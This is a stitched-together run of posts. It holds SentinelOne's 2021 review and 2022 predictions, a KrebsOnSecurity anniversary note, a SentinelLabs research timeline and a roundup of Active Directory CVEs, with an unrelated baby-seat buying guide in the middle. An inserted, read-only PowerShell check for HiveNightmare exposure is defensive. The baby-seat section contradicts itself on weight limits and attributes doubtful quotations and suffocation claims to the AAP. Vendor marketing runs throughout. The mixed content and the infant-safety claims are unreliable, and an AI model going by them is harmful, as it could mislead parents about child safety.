The Best, The Worst and The Ugliest in Cybersecurity | 2021 Edition

As this Friday falls on New Year’s Eve, rather than taking our usual look back at the week’s Good, Bad and Ugly stories, we thought we’d take this opportunity to cast our retrospective gaze over the whole of 2021 and bring you the best, the worst, and the ugliest moments of the year.

The Best

There have been some great moments during 2021, both for SentinelOne in particular and for cybersecurity in general. SentinelOne’s IPO in June not only took the company to its next stage of evolution but was the largest cybersecurity IPO in history.

Just prior to that, our innovative, best-of-breed Singularity platform had aced MITRE Engenuity’s annual evaluations. No other vendor’s offering was able to match SentinelOne’s performance, with MITRE finding that SentinelOne was the only vendor with 100% visibility, zero missed detections and no configuration changes throughout the entire evaluation period.

Among other innovations during 2021, SentinelOne expanded its offerings to include Mobile Threat Defense, offering customers the ability to manage mobile device security alongside their user workstations, cloud workloads, and IoT devices.

Mobile Threat Defense
Bringing AI-Powered Endpoint Security To Your Mobile Devices

The year also saw the U.S. government begin a long-overdue crackdown on cybercrime, with initiatives to beef up Federal defenses and pursue criminals attacking the U.S. while hiding abroad. Alongside Biden’s Executive Order and pledges of financial support from private enterprise, the government announced new export controls on the sale of hardware or software that could be used in cyberattacks against the U.S., as well as sanctions against a number of spyware companies.

Among a number of arrests and seizures during the year, law enforcement broke a new record for the number of cybercriminals nabbed in a single operation when Interpol announced the arrest of over 1000 cybercriminals in operation HAECHI-II.

The Worst

If there’s one thing you won’t find much disagreement about in infosec, it’s that this year has had more than its fair share of bad moments. Our weekly news roundup was dominated throughout 2021 by two main themes: severe vulnerabilities and ransomware attacks.

In June, details emerged of a remotely exploitable vulnerability in the Microsoft Windows Print Spooler service affecting all versions of Windows, appropriately dubbed PrintNightmare. Related CVEs (CVE-2021-34527 and CVE-2021-1675) that allow remote code execution were quickly folded into popular attack tools like Mimikatz and Metasploit and caused untold headaches for IT and SOC teams around the world.

That crisis-for-admins was followed by local privilege escalation HiveNightmare (CVE-2021-36934) in August. An attacker with a foothold on a system could use the flaw to extract registry hive data, including hashed passwords, which in turn could be used to further elevate privileges.
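A read-only check for the exposure just described, added here as an example and not code from the original article: it inspects the on-disk SAM, SYSTEM and SECURITY hive files and reports whether BUILTIN\Users holds read access, which is the condition behind CVE-2021-36934. It assumes a stock Windows path layout and must be run from an elevated PowerShell session.

```powershell
# Added example (not from the original article): detect whether this host is
# exposed to CVE-2021-36934 (HiveNightmare). The defect is an over-permissive
# ACL on the registry hive files, which lets a non-admin local user read
# hashed credentials from them. This script only reads ACLs; it changes nothing.
# Assumes the default %windir%\System32\config layout. Run as administrator.

$hiveDir = Join-Path $env:windir 'System32\config'
$hives   = 'SAM', 'SYSTEM', 'SECURITY' | ForEach-Object { Join-Path $hiveDir $_ }
$readBit = [System.Security.AccessControl.FileSystemRights]::ReadData

$exposed = foreach ($path in $hives) {
    if (-not (Test-Path -Path $path)) { continue }
    $acl = Get-Acl -Path $path
    # Any Allow ACE granting ReadData to the Users group means non-admins can read the hive.
    $bad = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -eq 'BUILTIN\Users' -and
        (($_.FileSystemRights -band $readBit) -ne 0)
    }
    if ($bad) { $path }
}

# Shadow copies are part of Microsoft's published workaround: snapshots taken
# before the ACL is corrected still carry the old permissions, so they must be
# removed once the live files are fixed. Count them so the report is complete.
$shadowCount = (Get-CimInstance -ClassName Win32_ShadowCopy | Measure-Object).Count

if ($exposed) {
    Write-Output 'Hive files readable by BUILTIN\Users (CVE-2021-36934 exposure):'
    $exposed | ForEach-Object { Write-Output "  $_" }
    Write-Output "Existing Volume Shadow Copies: $shadowCount"
    Write-Output 'Mitigation (Microsoft workaround): restore inherited ACLs on the hive directory, e.g.'
    Write-Output "  icacls $hiveDir\*.* /inheritance:e"
    Write-Output 'then delete shadow copies created before the fix, and confirm with this check again.'
} else {
    Write-Output 'No hive file grants read access to BUILTIN\Users; host is not exposed.'
}
```

The ACL fix alone does not close the exposure while pre-fix shadow copies remain, which is why the script reports their count alongside the ACL result.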

Even more lost weekends were on the cards in December when things went from bad to worse with the Log4j2 vulnerability. We will be seeing the effects of this for some time to come, as organizations struggle to understand their exposure to a vulnerability in the widely-used Java logging utility.

Resource Center | Log4j2 | Log4Shell
Stay Informed with Hunting Queries, Demos, and More

The Ugliest

Which brings us to ransomware. While there’s no doubt about the severe threat that unpatched vulnerabilities can pose to businesses, ransomware attacks can and do have life-threatening and business-ending consequences for those affected by them.

In 2021, threat actors made quick and regular work of public sector organizations that failed to protect their networks, with schools and hospitals both at home and abroad being frequent victims.

But arguably the ugliest of the year in terms of collateral damage felt beyond the domain of the immediate victim was the Colonial Pipeline attack by DarkSide ransomware. The attack in May led the states of North Carolina, Virginia, Georgia, and Florida to declare a state of emergency and to fuel prices rising to an average of $3 a gallon, with some outlets charging double that in the face of panic buying.

Even the bad guys felt the shockwaves, as underground crimeware forums began to ban discussions of ransomware for fear of retribution by the authorities.

That, alas, did little to stem the real-world threat of further ransomware attacks, and the year carried on pretty much as it started, with new threat actors, new ransomware families and, of course, new attacks.

Ebook: Understanding Ransomware in the Enterprise
This guide will help you understand, plan for, respond to and protect against this now-prevalent threat. It offers examples, recommendations and advice to ensure you stay unaffected by the constantly evolving ransomware menace.

Will 2022 see defenders get the upper hand over attackers, or will organizations yet again be up against the ropes? Our predictions for this coming year can be found here.

Our regular weekly roundup will be back next week as usual, and in the meantime, from all of us at SentinelOne, we wish you a happy and secure New Year 2022!

SentinelOne’s Cybersecurity Predictions 2022: What’s Next?

2021 was a year in which everything escalated. The pandemic triggered more separation, more isolation, and a general unease in our ability to discern the good from the bad. In cybersecurity, we saw a sharp increase in the number of threat actors riding the wave of the ransomware economy, more governments using cyber space to influence nation state politics, and definitely more software vulnerabilities. The combined effect of these has made breaches easier and security harder.

So where will 2022 lead us? Our predictions last year weren’t far off the mark, so as we look forward to another year in the trenches of cybersecurity, we gather some of SentinelOne’s best researchers and thought leaders once again to read the tea leaves of the central motifs they see coming to bear in 2022.

We Haven’t Reached ‘Peak Ransomware’ Yet

Ransomware operators have, throughout the last year, continued to display their absolute lack of compunction. Numerous high-profile attacks in 2021 demonstrated that these actors will seize any opportunity to profit. In 2022, expect the availability of highly-critical vulnerabilities such as log4j, which have exposed countless environments while greatly enhancing attackers’ toolsets, to be making the headlines more than once.

This past year also saw the wider and accelerated adoption of malware written in Rust and Go programming languages. One of the main benefits of this practice is, naturally, cross-platform compatibility. A few recent examples of this include BlackCat/AlphaVM ransomware, RansomEXX ransomware and ElectroRAT. We are trending towards a majority of these threats being multiplatform out of the gate. As we progress into 2022, expect to see a greater number of new, cross-platform malware families emerge.

Targeting of healthcare entities (hospitals, medical research facilities, private clinics) will continue to be a critical issue. While on the surface many threat operators claim to avoid attacking medical-centric targets, the reality is far less altruistic. We continue to see ransomware infecting these environments, at times costing lives. In 2022, expect to see no let up in aggressive, unscrupulous ransomware operations targeting organizations regardless of the impact on public safety.

We will also continue to see the identity of these operations blur, with various groups continuing to hide in the open while attempting to circumvent any new penalties or sanctions through frequent re-branding of their operations. Jim Walter, Senior Threat Researcher, SentinelLabs

You Can’t Spend Or Arrest Your Way Out Of Cybersecurity

We’ve seen the number of ransomware attacks rise steadily, despite enterprises spending millions. Although the US government assembling the ransomware task force was done out of good intention, it’s demonstrated that arresting the cybercriminals responsible, such as the alleged member of the REvil ransomware gang, is not going to be enough.

Recently, the U.S. State Department offered a reward of up to $10 million “for information leading to the identification or location of any individual(s) who hold(s) a key leadership position in the DarkSide ransomware variant transnational organized crime group.” While not officially linked to the Russian Federation, DarkSide was able to operate inside Russia with the apparent implicit approval of the government. The use of State Department funds underscores the desire to keep the military option in reserve while using diplomatic and other means to identify and bring to justice transnational organized crime actors.

Continued ransomware activity throughout 2022 will prove that we can’t spend or arrest our way out of cyberattacks. Instead, we must change our way of thinking. The problem isn’t the problem, it’s the way we think about the problem. And that’s not what matters. It’s how our adversaries think about the problem that really counts.

We need to think critically about the problems we are trying to solve to beat cybercriminals at their own game. Playing inside the lines isn’t going to cut it – it’s time to think outside of the box and fight machine with machine. Morgan Wright, Chief Security Advisor, SentinelOne

Software Dependencies Are Your Weakest Link

From the end of last year with SolarWinds to the end of this year with Log4j2, the alarm bells have been ringing loud and clear: software dependencies are a massive blindspot and a major vector for supply chain attacks.

The likelihood of widely-used software components being secure out-of-the-box is low at best. Even with the best of intentions, the mindset of those that create and share useful modules, plug-ins, packages and other utility code is rarely security-focused. On top of that, the ability of an enterprise to be able to test and evaluate every piece of software that enters their network is limited for most, including the federal government.

2022 represents both an opportunity and a threat: we can tackle the problem with technology and visibility across our entire cyber estate, or we can continue as we’ve been going along, waiting for the next well-crafted nation-state attack like Sunburst or the next “universal vulnerability” like Log4j2. Overworked SOC teams and admins may vote with their feet. Migo Kedem, VP of Growth and Founder of SentinelLabs, SentinelOne

SentinelOne Singularity XDR
See how SentinelOne XDR provides end-to-end enterprise visibility, powerful analytics, and automated response across your complete technology stack.

APTs Getting Down to Business

Working in the trenches of cybersecurity research, it’s easy to get carried away with flashy and innovative operations. It’s easy to forget that ‘APT’ is a euphemism for a stratum of intelligence collection operators well entrenched in the national apparatus of the majority of countries worldwide. After all, some of the more notable APTs have been around for nearly a quarter of a century.

Instead of romanticizing them as rogue outfits of wily hackers, many of these nation-state adversaries are entrenched in bureaucracies, they have objectives to meet, and–contrary to popular researcher belief–their primary goal isn’t to impress us.

This past year, nation-state adversaries learned a tried-and-true formula that being unimpressive and downright mundane (at least in the early stages of their operations) inevitably increases their return-on-investment. In other words, if your infection vector is an email ($0) with some JavaScript loaders for Cobalt Strike or Metasploit ($0), allowing you to validate victims, look out for security solutions, begin basic collection, and deploy second-stage tools where they won’t be burned, then whatever persistence and collection you accomplish represents a booming ROI.

Moreover, it’s easier to blend into the noise of ‘business-as-usual’ when you’re just another APT doing intellectual property theft with no zero-day exploits, custom tooling, or notable antics. How many threat hunters will get out of bed to make it their business to track those folks when there are flashy high-end actors out there to blog about?

I’m afraid that 2022 will further slide us into the more mundane aspects of cyberespionage – as a pervasive but low-grade, constant but unremarkable onslaught of collection efforts from all sides that we’ve essentially grown used to. Juan Andres Guerrero-Saade, Principal Threat Researcher, SentinelLabs

Private Espionage Businesses Will Continue To Flourish

Private espionage businesses will encounter many setbacks due to their increased attention over the last year, but that will neither deter nor prevent the growth of such a lucrative and in-demand trade. We can expect researchers to uncover new and less-reported businesses selling surveillance-for-hire technology and resources around the globe with little regard for real-world impact.

While some well-known companies such as Russia’s Positive Technologies, Singapore’s Computer Security Initiative Consultancy, Israel’s Candiru, and perhaps most famously, the NSO Group, have experienced crippling government sanctions or negative media coverage during 2021, we can expect these and others to rebrand, split, or generally evolve with the opportunity of profits in mind. This type of business will not go away in 2022. Tom Hegel, Senior Threat Researcher, SentinelLabs

Securing the Intricacies of Enterprise Cloud Dependency

Enterprises will need to adopt cloud native security faster and respond to these threats from the front lines as customer data privacy on cloud-native servers will be put to the test. The on-going cloud-credential stealing feast will continue, and we will see cloud-native ransomware implemented by abusing weak permissions and stolen Azure and AWS API credentials.

On-Premise Active Directory will continue to fade away, while Azure Active Directory is pushed towards major adoption. As companies like Okta and JumpCloud get further buy-in, they’ll start facing increased interest from every stripe of hacker looking to gain access to large swaths of victims at once.

From the defenders’ perspective, API Security solutions will become a necessity. XDR adoption will grow via MSSPs forcing threat hunters to adopt more automations. These will provide coverage for the new data sources and will enable defenders to face the new battle-terms. Rafel Ivgi, Principal Security Technologist, SentinelLabs

More Targeted Attacks On Enterprise Macs (and Other Apple Devices Near You)

Unsurprisingly, and as we predicted last year, there has been a glut of macOS and iOS vulnerabilities disclosed in 2021 due to the increased scrutiny of Apple’s platforms by both security researchers and threat actors. Stealing the show during 2021 was NSO’s Pegasus zero-click iMessage exploit, in which a zero-day vulnerability (CVE-2021-30860) in Apple’s Core Graphics framework was used to construct an entire emulated computer architecture.

Meanwhile, although Macs have never been at the heart of most companies’ network or server infrastructures, the Mac has become a firm-favorite among developers and C-Suite level executives – an enticing combination for threat actors interested in high-value targets.

At the same time, iOS and macOS security is woefully misunderstood by Apple users, including in the enterprise. While Mac users at least have the ability to install 3rd-party EDR products for detection and protection against malware, few choose to do so, persuaded by a strong “Macs are safe by design” marketing message from Apple. Lulled into believing that the Mac’s legacy AV scanner XProtect and the regularly-bypassed Gatekeeper and Notarization technologies are somehow enough, users leave themselves and their organizations vulnerable to attacks. The fact is, the Mac’s built-in defenses are far from adequate, as even Apple admitted earlier this year.

Recent history has shown that threat actors with the most resources – nation-states – are willing to spend those resources on targeting dissidents, journalists and political opponents. Whether it’s buying NSO spyware like Pegasus or creating Mac-specific backdoors like macOS.Macma, governments (or their proxies) have been the main driver of targeted attacks against Apple’s platforms so far. However, where nation-states go, criminals soon follow.

These three factors – increased attention on Apple device vulnerabilities, wider use of Macs in the enterprise, and the false sense of security that Macs are safe and don’t need 3rd-party protection – will lead to more high-value, targeted attacks against Apple device users in 2022. Phil Stokes, macOS Threat Researcher, SentinelLabs

The Complete Guide to Understanding Apple Mac Security for Enterprise
Learn how to secure macOS devices in the enterprise with this in-depth review of the strengths and weaknesses of Apple’s security technologies.

Conclusion

While this year saw the U.S. government making some valiant efforts to try and tackle the long-standing challenges of cybersecurity, it is enterprises that are the first and last line of defense, needing to stay focused on growth and commercial expansion while not risking it all by getting breached and losing trust and material funds.

Whatever challenges 2022 brings, we all need to ensure that we are taking care of the basics: strong preventative measures, clear Incident Response and Disaster Recovery planning, and let’s not forget to take care of our people on the front line! From all of us at SentinelOne, we wish you a happy and secure New Year!

If you would like to learn how SentinelOne can protect your organization, contact us or request a free demo.

Happy 12th Birthday, KrebsOnSecurity.com!
KrebsOnSecurity.com celebrates its 12th anniversary today! Maybe “celebrate” is too indelicate a word for a year wracked by the global pandemics of COVID-19 and ransomware. Especially since stories about both have helped to grow the audience here tremendously in 2021. But this site’s birthday also is a welcome opportunity to thank you all for your continued readership and support, which helps keep the content here free to everyone.

More than seven million unique visitors came to KrebsOnSecurity.com in 2021, generating some 12 million+ pageviews and leaving almost 8,000 comments. We also now have nearly 50,000 subscribers to our email newsletter, which is still just a text-based (non-HTML) email that goes out each time a new story is published here (~2-3 times a week).

Back when this site first began 12 years ago, I never imagined it would attract such a level of engagement. Before launching KrebsOnSecurity, I was a tech reporter for washingtonpost.com. For many years, The Post’s website was physically, financially and editorially separate from what the dot-com employees affectionately called “The Dead Tree Edition.” When the two newsrooms finally merged in 2009, my position was eliminated.

Happily, the blog I authored for four years at washingtonpost.com — Security Fix — had attracted a sizable readership, and it seemed clear that the worldwide appetite for in-depth news about computer security and cybercrime would become practically insatiable in the coming years.

Happier still, The Post offered a severance package equal to six months of my salary. Had they not thrown that lifeline, I doubt I’d have had the guts to go it alone. But at the time, my wife basically said I had six months to make this “blog thing” work, or else find a “real job.”

God bless her eternal patience with my adopted occupation, because KrebsOnSecurity has helped me avoid finding a real job for a dozen years now. And hopefully they let me keep doing this, because at this point I’m certainly unqualified to do much else.

I’d be remiss if I didn’t take this opportunity to remind Dear Readers that advertisers do help keep the content free here to everyone. For security and privacy reasons, KrebsOnSecurity does not host any third-party content on this site — and this includes the ad creatives, which are simply images or GIFs vetted by Yours Truly and served directly from krebsonsecurity.com.

That’s a long-winded way of asking: If you regularly visit KrebsOnSecurity.com with an ad blocker, please consider adding an exception for this site.

Thanks again, Dear Readers. Please stay safe, healthy and alert in 2022. See you on the other side!

12 Months of Fighting Cybercrime & Defending Enterprises | SentinelLabs 2021 Review

It’s been a busy year for the SentinelLabs research team, with 45 posts published throughout 2021 on crimeware, APT actors, software vulnerabilities, and macOS malware, not to mention releasing a few community tools for reverse engineering and threat hunting.

Ransomware and APT actors have dominated much of our year, along with some spectacular vulnerabilities that have impacted enterprises worldwide. We’ve seen novel attacks targeting macOS and threat actors setting their sights on Docker containers and cloud workloads.

As ever, you can find all our research and threat intelligence posts over at SentinelLabs, but for a quick recap on some of the main highlights, take a scroll through our 2021 timeline below.

January

In early January, we broke news of macOS.OSAMiner, a long-running cryptominer campaign targeting macOS users. What made this particular campaign so effective at staying undetected for at least five years was its use of run-only AppleScripts. SentinelLabs’ research showed how researchers can reverse these opaque executables and revealed previously hidden IoCs.

FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts

February

Zeoticus ransomware was causing trouble prior to 2021 but had received little attention from researchers. Unusually, Zeoticus executes fully even if the device is air-gapped or has no internet connectivity. SentinelLabs detailed how this Windows-specific malware had evolved, and described its execution and persistence methods.

Zeoticus 2.0 | Ransomware With No C2 Required

In February, SentinelLabs also revealed a privilege escalation vulnerability in Microsoft’s flagship security product, Windows Defender. The bug, CVE-2021-24092, had remained unreported for 12 years and likely affected around a billion devices.

March

More macOS malware came to light in March in the form of SentinelLabs’ discovery of XcodeSpy, a targeted attack on iOS software developers using Apple’s Xcode IDE. A malicious Xcode project was found to be installing a customized backdoor with the ability to record the victim’s microphone, camera and keyboard.

New macOS Malware XcodeSpy Targets Xcode Developers with EggShell Backdoor

April

While Windows vulnerabilities are a fairly common occurrence, SentinelLabs’ report of a new NTLM relay attack was, surprisingly, classed as a “Won’t Fix” by Microsoft in April. The vulnerability affects every Windows system and could allow attackers to escalate privileges from user to domain admin.

Relaying Potatoes: Another Unexpected Privilege Escalation Vulnerability in Windows RPC Protocol

On the crimeware front, this month SentinelLabs also published an update on Avaddon RaaS and detailed APT activity relating to Zebrocy.

May

As we kicked into the summer months, adversary activity also started to ramp up beginning with Agrius, a new threat actor SentinelLabs observed operating against targets in Israel. Agrius actors dropped a novel wiper named ‘Apostle’, which later evolved into a fully functional ransomware.

From Wiper to Ransomware | The Evolution of Agrius

Also in May, SentinelLabs researchers disclosed CVE-2021-21551, a single CVE to track multiple BIOS driver privilege escalation flaws impacting hundreds of millions of Dell computers.

June

Building off earlier research around APT actor Nobelium (aka APT29, The Dukes), SentinelLabs discovered that the same threat actor (tracked by SentinelLabs as ‘NobleBaron’) was engaged in supply-chain attack activity via a poisoned update installer for electronic keys used by the Ukrainian government.

NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks

Also this month, SentinelLabs presented evidence that an attack on Russia’s FSB that had been widely-attributed to Western “Five Eyes” agencies was far more likely to have been of Chinese origin, probably from threat actor TA428.

July

Cyberwar took an unusual turn in July when Iran’s train system was paralyzed by an attack from a mysterious wiper. The attackers taunted the Iranian government as hacked displays instructed passengers to direct their complaints to the phone number of the Iranian Supreme Leader Khamenei’s office. SentinelLabs researchers were able to reconstruct the majority of the attack chain and sketch the outline of a new adversary.

MeteorExpress | Mysterious Wiper Paralyzes Iranian Trains with Epic Troll

This month also saw the Labs team disclose CVE-2021-3438 – a high severity flaw in HP, Samsung, and Xerox printer drivers – and offer an in-depth analysis of Conti ransomware.

August

ShadowPad is a privately sold modular malware platform used in infamous campaigns such as the CCleaner, NetSarang and ASUS supply-chain attacks. SentinelLabs researchers produced a ground-breaking report on the origin, use and ecosystem of ShadowPad.

ShadowPad | A Masterpiece of Privately Sold Malware in Chinese Espionage

One of the busiest months of the year for our researchers, August also saw us disclose a massive macOS adware campaign undetected by Apple, a ransomware campaign targeting healthcare providers, and HotCobalt – a denial-of-service vulnerability affecting Cobalt Strike.

September

In another in-depth investigation into cyberespionage and APT activity, SentinelLabs broke the story of a Turkish-nexus threat actor that targeted journalists to place malware and incriminating documents on their devices immediately prior to their arrest.

EGoManiac | An Unscrupulous Turkish-Nexus Threat Actor

We also reported on new variants of both Apostle ransomware and the Zloader banking trojan, as well as disclosing CVE-2021-3437.

October

Both Karma ransomware and Spook ransomware were new players in 2021’s ransomware ecosystem. Karma has targeted numerous enterprises across different industries this year. SentinelLabs explored the links between Karma and other well known malware families such as NEMTY and JSWorm.

Karma Ransomware | An Emerging Threat With A Hint of Nemty Pedigree

Meanwhile, SentinelLabs’ investigation into Spook ransomware found that the operator published details of all victims regardless of whether they paid or not.

November

APTs targeting macOS are a far rarer sight than on Windows, but this November saw news break of a targeted attack against pro-democracy activists in Hong Kong with a novel macOS malware dubbed “Macma”. SentinelLabs dove in and revealed further IoCs not previously reported to aid defenders and threat hunters.

Infect If Needed | A Deeper Dive Into Targeted Backdoor macOS.Macma

SentinelLabs also disclosed multiple separate vulnerabilities this month: CVE-2021-43267, a remote Linux kernel heap overflow, and a set of related VirtualBox vulnerabilities (CVE-2021-2145, CVE-2021-2310 and CVE-2021-2442).

December

Unsurprisingly, we rounded out the year with yet another novel ransomware threat. While most actors in this space have adopted the double-extortion method – demand a ransom for encrypted files, then threaten to leak the data if the victim doesn’t pay up – the operators behind Rook were particularly candid about their motivations, stating “We desperately need a lot of money”. SentinelLabs researchers offered the first technical write-up of Rook, covering both high-level features and its ties to Babuk ransomware.

New Rook Ransomware Feeds Off the Code of Babuk

We also discovered and disclosed multiple vulnerabilities in AWS and other major cloud services that implement USB over Ethernet.

Conclusion

2021 was some year for everyone involved in fighting cybercrime and defending enterprises. From APTs and bugs to malware and ransomware, we’ve all had plenty to do to keep up with the unfolding cybersecurity threats this year. SentinelLabs continues in its commitment to keep you up to date with the latest research and threat intelligence.

We’ll be back shortly after the New Year. In the meantime, we wish everyone a happy and secure New Year and 2022. Be sure to keep your organization, endpoints, network and cloud infrastructure safe with SentinelOne’s award-winning Singularity platform, and keep your security team up-to-date with SentinelLabs’ original and timely research.

At What Age Can Babies Use A Bumbo Chair?

The Bumbo chair can be used from around 4 months old (when your baby has good head control and can sit unassisted) until they can climb out of it (usually about 12 months old). It should not be an alternative to an infant seat or bouncer. The chair helps support your baby in a seated position, which can help with their development.

However, it is essential to remember that the age recommendation is just a recommendation. There is no definitive answer as different babies will reach the developmental milestones necessary to use a bumbo chair at different ages. However, most babies can use a bumbo chair safely by around 4 months old.

Remember that it is always important to consult with your pediatrician before giving your baby any new type of seat.

Can older babies use bumbo chairs? (8 months and up)

Yes, if your child is over eight months and meets the guidelines above, they can still use a bumbo chair. Many parents report that their children enjoy using the bumbo well into the second year.

What is a Bumbo chair?

A Bumbo chair, also known as a bumbo seat, is a molded plastic chair with a round, flat bottom. There is a three-point harness to secure the baby, and the child has no control over the direction they are facing. The Bumbo chair can be used on any flat surface. The manufacturer also makes other products designed for use with the bumbo, such as playpens, activity gyms, bath seats, and stools.

However, there are concerns that a baby seated in a bumbo is not visible to those around them, which has led to several cases of accidental suffocation.

The American Academy of Pediatrics (AAP) recommends against using the bumbo as it “poses a risk for serious head injuries and ejection from the chair” as well as other problems such as aspiration. The AAP has also stated that the bumbo chair “should not be used for routine feeding.”

How to use a bumbo chair safely

Despite the risks associated with using the bumbo chair, many parents find it helpful in supporting their baby in a seated position. If you do choose to use a bumbo chair, there are steps parents can take to use the bumbo chair safely.

  • First, be sure that your baby can sit up unassisted before placing them in the bumbo seat.
  • The bumbo should not be used on an elevated surface.
  • Always use the harness whenever your baby is seated in the bumbo.
  • The bumbo should not be used for longer than 30 minutes at a time.

If you are concerned about your baby’s safety, remember that it is essential to contact your pediatrician. It is also helpful to talk with other parents who have used the chair before, as they may offer additional advice based on their personal experiences.

Bumbo chair alternatives

If you are not comfortable using a bumbo chair, other options are available to help your baby sit up. You can try an infant seat or bouncer, which will provide more support for your baby.

Fisher-Price Sit-Me-Up Floor Seat

This Fisher-Price floor seat is an excellent alternative to the Bumbo chair. Invite your child to sit up and play in a comfortable, sturdy seat that provides them with a view of the world around them! The two linked toys, a turtle spinner with a mirrored side and entertaining clackers keep your cuddle bug occupied. And the comfy seat cushion is detachable and machine-washable, making cleanup simple!

The Sit-Me-Up Floor Seat’s supportive upright seat and broad, stable base allow your child to observe and interact with the world around him, providing comfort and security.

The lightweight and ultra-compact design of this foldable baby chair make it a breeze to transport your loved one along with you to grandma’s house or wherever you’re going.

It can be used for babies up to 25 pounds or until they can sit up on their own without assistance.

Summer Learn-to-Sit Stages 3-Position Floor Seat

This Summer 3-position floor seat is a great alternative to the Bumbo chair. It is designed to help your baby learn to sit up on their own, and it can be used for babies up to 40 pounds. The Summer Learn-to-Sit Stages 3-Position Floor Seat has three different height levels, so it can grow with your child as they gain new skills.

  1. The first position is lower to the ground and is intended for babies with complete neck control.
  2. When your baby learns to sit up, transition them to the second position, which will assist in developing balance.
  3. The highest position is for babies who begin to sit up.

The Learn-to-Sit Stages 3-position floor seat features detachable toys and a meal tray to provide everything you need. This chair also folds completely flat for storage and travel, making it ideal.

This baby chair is extra-safe and easy to use. It supports up to 25 pounds so that you can use it for a long time! It also comes with a comfortable cushion that makes this perfect for playtime, nap time, or anytime.

The ergonomic design of this sturdy baby floor seat distributes your child’s weight evenly, making it more comfortable for them to sit up. And the broad base prevents your little one from tipping over.

Fisher-Price Healthy Care Deluxe Booster Seat

This Fisher-Price healthy care booster seat is perfect for when your baby begins to sit up on their own all the way to toddlerhood. The Healthy Care Booster Seat supports babies up to 50 pounds and helps them develop the skills they need to transition to a regular chair.

It has a three-point harness for safety and a removable tray with two cup holders, and a snap-on lid that doubles as a serving tray. The Booster Seat folds up for easy storage and transport, and it wipes clean easily.

The easy cleaning is what makes this kids’ chair special. There are no nooks or crannies to retain crumbs, so you can keep your baby’s space clean. The feeding tray can be cleaned in the dishwasher to reduce germs.

This Fisher-Price kids’ chair is durable enough to last through long family gatherings. It has an extended use up to six years so that it can grow with your child. The lightweight design makes it easy to move from one place to another.

Infantino 3-in-1 Booster Seat

This Infantino 3-in-1 booster seat is perfect for your growing child. It can be used in 3 different ways:

  • as a seated positioner
  • as a feeding booster
  • as a table booster seat

The Infantino 3-in-1 Booster Seat is designed to support babies up to 33 pounds so that it can be used for a long time.

The Infantino Grow-With-Me Discovery Seat and Booster is a three-in-one product that provides an interactive play area, snack time seat, and secure booster with harnesses.

Babies sit and play with toys: spinners, mirror play, and silly squeakers, encouraging sensory development. When it’s time for a snack, just remove the detachable toy pods to reveal a snack tray with a cup holder. Use the security straps to attach the booster seat to a kitchen chair as your baby grows.

Skip Hop 2-in-1 Sit-up Activity Baby Chair

This Skip Hop 2-in-1 Sit-up Activity Baby Chair is perfect for when your baby begins to sit up on their own. The Skip Hop 2-in-1 Sit-up Activity Baby Chair has a soft, comfortable seat with an adjustable harness to keep your child safe. It also comes with a removable tray with a built-in cup holder and an activity center with various activities to keep your baby entertained.

The 2-in-1 design makes this baby chair super convenient. Parents can alternate between a multipurpose tray (perfect for snacks!) and three interesting toys, depending on whether it is time for a meal or play.

The sturdy, wide-leg foundation provides stability, while the soft fabric seat cover makes the Skip Hop chair comfy. The seat cover may be removed for simple machine washing.

Ingenuity Baby Base 2-in-1 Booster Feeding and Floor Seat with Self-Storing Tray

This product shows how to transform a playtime chair into a snack-time seat quickly!

The Baby Base securely clamps onto dining chairs, allowing your child to sit higher and see more during family dinners. Cute in design, this tiny baby feeding chair is lightweight and portable. It’s a fantastic option for at-home or on-the-go dining with your child!

The detachable tray allows your youngster to have their own perfectly sized table, so they can easily reach food or toys. The tray conveniently folds up underneath the booster seat when it is not used. The tray is also dishwasher safe, making mealtimes a pleasure. Wipe the base and foam insert clean with a damp cloth and mild soap to remove dust.

The Baby Base may be used once your baby can hold its head up independently. The safety strap fastens tightly to your dining chair, and the 3-point harness keeps the baby safe.

Remove the foam seat insert when your baby gets older and use it as a toddler seat. Suitable for 6 months to 36 months.

Upseat Baby Chair Booster Seat with Tray

Upseat Baby Chair Booster Seat was designed by physical therapists with developing babies in mind and targets the muscles responsible for good upright posture while also being safe for a child’s developing hips.

Upseat baby seats allow for chubby legs and keep babies’ hips in a safe and correct posture. This chair is recommended for kids who can sit on their own, mainly from the 3rd month of life until 12 months. Upseat Baby Chair Booster Seat holds up to 30 pounds.

This baby chair can be used in 3 ways:

  • as a floor seat
  • as a booster seat
  • as a feeding chair

Upseat baby chair booster seat comes with a detachable tray, so it is super easy to clean up after mealtime.

The post At What Age Can Babies Use A Bumbo Chair? appeared first on Comfy Bummy.

The Good, the Bad and the Ugly in Cybersecurity – Week 52

The Good

We have a few nifty victories for law enforcement this week. First off, an individual who hails from Massachusetts, Flavio Candido da Silva, recently pled guilty to aggravated identity theft and conspiracy to commit wire fraud in a Boston federal court. Da Silva is alleged to be part of a larger team responsible for the theft of identities and the manufacture and distribution of falsified documents. The case relates to charges laid back in May when nineteen individuals were charged with conspiracy to open fraudulent driver accounts at multiple rideshare and delivery companies.

In some cases, identifying information used to feed fake accounts was obtained directly from victims through social engineering. The actors would gain access to victims’ identification documents by posing as an alcohol delivery service or deliberately causing minor vehicle accidents. The fraudulent accounts were used to further spoof income documents for these newly-created fake workers. There is potentially a lengthy jail term tied to this one, which hopefully will serve as a deterrent to those thinking of engaging in cybercrime.

The week would not be complete without mention of Log4j. There have been some important updates around this threat from the wider community, including CISA’s Mitigating Log4Shell and Other Log4j-Related Vulnerabilities, which was updated on December 22nd. Their advisory serves as a launching point for various other Joint Cybersecurity and JCDC advisories. As always, the latest bleeding edge updates will be posted on the SentinelOne blog.

The Bad

On top of the extra workload IT admins have been dealing with thanks to the ongoing log4j2 vulnerability, this week’s bad news is particularly unwelcome as it involves another “patch the thing we already patched” scenario from Microsoft. This week’s new fire hazard comes courtesy of two Active Directory domain controller bugs. The bugs were addressed last month, but it turns out they can still be exploited by attackers and allow the takeover of Windows Domain Controllers.

The two flaws, which have a severity rating of 7.5, are tracked as CVE-2021-42278 and CVE-2021-42287. The new advisory comes in the wake of a publicly available exploit being published back on December 12th.

SAM Name impersonation (CVE-2021-42278) allows attackers to tamper with the SAM-Account-Name attribute used to log users into a system in the AD domain. Meanwhile, KDC Bamboozling (CVE-2021-42287) allows a potential attacker to impersonate a domain controller directly. According to Microsoft:

“Combining the two CVEs, an attacker with domain user credentials can leverage them for granting access as a domain admin user in a few simple steps.”

OK folks, you know the drill. Patch the patch, and ensure you have reliable endpoint protection in place.
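
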